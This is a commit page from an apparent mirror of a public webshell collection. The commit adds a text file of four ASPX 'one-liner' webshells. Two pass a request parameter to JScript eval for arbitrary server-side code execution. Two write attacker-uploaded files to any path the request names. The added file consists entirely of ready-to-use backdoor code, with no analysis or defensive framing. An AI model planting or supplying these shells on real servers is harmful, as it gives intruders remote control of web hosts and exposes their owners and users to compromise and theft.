mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
add the word webshell
This commit is contained in:
7
aspx/ASPX一句话02.txt
Normal file
7
aspx/ASPX一句话02.txt
Normal file
@@ -0,0 +1,7 @@
|
||||
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
|
||||
|
||||
< %@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
|
||||
|
||||
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
|
||||
|
||||
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
|
||||
Reference in New Issue
Block a user